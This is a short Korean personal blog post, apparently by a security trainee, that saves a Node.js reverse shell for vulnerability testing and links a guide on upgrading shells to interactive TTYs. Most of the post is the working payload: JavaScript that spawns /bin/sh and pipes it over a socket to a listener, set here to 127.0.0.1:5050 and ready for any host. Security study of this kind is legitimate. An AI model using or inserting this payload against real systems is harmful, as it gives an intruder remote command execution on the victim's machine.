요즘 비오비에서 진행하는 프로젝트 때문에 Node.js를 보고있다.
그리고 취약점 진단을 위한 Node.js 리버스쉘코드가 필요한데 이참에 정리해둔다.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(){ | |
| var net = require("net"), | |
| cp = require("child_process"), | |
| sh = cp.spawn("/bin/sh", []); | |
| var client = new net.Socket(); | |
| client.connect(5050, "127.0.0.1", function(){ | |
| client.pipe(sh.stdin); | |
| sh.stdout.pipe(client); | |
| sh.stderr.pipe(client); | |
| }); | |
| return /a/; | |
| })(); |
또한 아래는 리버스쉘 관련 팁들인데 시간나면 번역해서 정리해둬야겠다.
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
'HACKING > System hacking' 카테고리의 다른 글
| Android Kernel Exploitation (0) | 2021.01.04 |
|---|---|
| javascript engine fuzzing and exploitation reading list (0) | 2020.09.07 |
| python pty module with reverse shell (0) | 2019.09.21 |
| bash trick(꿀 tip) (0) | 2019.08.21 |
| tips for find binsh address using pwntool (0) | 2019.07.05 |